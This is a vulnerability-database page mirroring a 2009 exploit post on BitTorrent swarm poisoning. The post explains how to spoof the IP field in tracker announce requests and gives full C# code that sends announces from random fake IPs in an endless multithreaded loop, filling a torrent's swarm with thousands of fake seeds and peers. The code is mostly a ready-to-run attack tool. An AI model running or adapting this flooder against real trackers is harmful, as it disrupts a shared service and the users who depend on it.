Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Torrent Swarm Poisoning

🗓️ 18 Nov 2009 00:00:00Reported by BurningmaceType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Torrent Swarm Poisoning via Fake IP Announce

Code
`=== Credits ===  
Written by Burningmace.  
Thanks to Blindkilla for helping me out.  
  
=== Introduction ===  
The BitTorrent protocol identifies peers using a tracker. Each peer announces itself to the tracker via HTTP.  
Certain parameters in the announce request itself can be altered in order to fake the IP address of the peer.  
This can be used to "poison" the torrent by adding thousands of fake peers.  
  
=== The Principle ===  
The announce works like this:  
http://tracker.example.com/announce?info_hash=<hash>&peer_id=<id>&uploaded=0&downloaded=0&left=<left>&event=<event>&port=<port>&numwant=<n>&ip=<address>  
Where:  
- <hash> is the infohash of the torrent, escaped.  
- <id> is a random 20 character id generated by the client to identify itself.  
- <left> is the number of bytes left to download. use 0 when seeding.  
- <event> is the type of announce you are issuing. use "completed" if you're seeding, or "started" if downloading.  
- <port> is the local port on which your BitTorrent client is accepting connecitons.  
- <n> is the number of peers you wish to fetch. keep this low for repeated multiple requests.  
- <address> is the IP address that you wish to be bound to.  
  
The address parameter is normally used when users are behind a firewall or NAT router, but for most trackers  
it can be set to absolutely anything - including a DNS. An example of a request would be the following:  
  
http://tracker.example.com/announce?info_hash=%e6%8e%c7%d9%64%7a%d3%22%23%8c%e9%81%cb%aa%5a%24%fe%a5%2d%81&peer_id=01020304050607080901&uploaded=0&downloaded=0&left=0&event=completed&port=1234&numwant=5&ip=123.45.67.89  
  
=== Exploiting ===  
We can create a program that announces itself repeatedly to the tracker with fake IPs. To get the best out of  
this exploit, announce yourself as both seeds and peers. With a broadband connection, you can often add over  
a thousand fake peers to the swarm in less than 5 minutes.  
  
=== Example Code ===  
  
/*  
*  
* This C# code sends hundreds of announce requests per minute.  
*  
* I know you C fanboys are pulling you hair out right now, but I don't care. C# is the win, bitches.  
*  
*/  
using System;  
using System.Collections.Generic;  
using System.Text;  
using System.Net;  
using System.Threading;  
  
namespace SeedFucker  
{  
class Program  
{  
static void Main(string[] args)  
{  
// create a thread pool with 5 threads  
List<Thread> tp = new List<Thread>();  
for (int i = 0; i < 5; i++)  
{  
tp.Add(new Thread(TorrentThread));  
tp[i].Start();  
Thread.Sleep(10);  
}  
while (true)  
{  
Thread.Sleep(50);  
}  
}  
  
static void TorrentThread()  
{  
// create a web client with a "no cache" policy  
WebClient wc = new WebClient();  
wc.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.BypassCache);  
  
// the infohash of the torrent we want to poison  
string hash = "1d7e4cf69af1d88ba426572bfb98c4f603f5d2c1";  
  
// encode the hash  
string hashEncoded = "";  
for (int i = 0; i < 20; i++)  
{  
hashEncoded += "%" + hash[i * 2] + hash[(i * 2) + 1];  
}  
  
// enter the main loop  
while (true)  
{  
// generate a random IP address  
string ip = GenerateIP();  
// create a timestamp for display purposes  
string time = "[" + DateTime.Now.Hour.ToString().PadLeft(2, '0') + ":" + DateTime.Now.Minute.ToString().PadLeft(2, '0') + ":" + DateTime.Now.Second.ToString().PadLeft(2, '0') + "] ";  
  
// if completed == true then we're pretending to be a seed. otherwise pretend to be a peer  
bool completed = (RNG.Next(0, 3) == 0);  
string torrentEvent = (completed ? "completed" : "started");  
// pick a random size   
int left = (completed ? 0 : RNG.Next(1024 * 1024 * 2, 1024 * 1024 * 1024));  
// create the url - change the announce url to whatever your particular torrent is using  
string url = "http://tracker.example.com/announce?info_hash=" + hashEncoded + "&peer_id=" + RNG.Next(1000000, 9999999).ToString() + RNG.Next(100000, 999999).ToString() + RNG.Next(1000000, 9999999).ToString() + "&port=" + RNG.Next(5000, 32000).ToString() + "&uploaded=0&downloaded=0&left=" + left.ToString() + "&event=" + torrentEvent + "&numwant=5&ip=" + ip;  
// attempt the announce  
try  
{  
wc.DownloadData(url);  
Console.WriteLine(time + "Sent tracker request: " + (completed ? "Seed" : "Peer") + " [" + ip + "]");  
}  
catch  
{  
}  
}  
}  
  
static string GenerateIP()  
{  
// generate an IP in the range [50-220].[10-100].[1-255].[1-255]  
return RNG.Next(50, 220).ToString() + "." + RNG.Next(10, 100).ToString() + "." + RNG.Next(1, 255).ToString() + "." + RNG.Next(1, 255).ToString();  
}  
}  
  
class RNG  
{  
private static Random _rng = new Random();  
  
public static int Next(int min, int max)  
{  
return _rng.Next(min, max);  
}  
}  
}`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Nov 2009 00:00Current
7.4High risk
Vulners AI Score7.4
bittorrent protocolfake peersexploitingc# codetracker manipulation.
29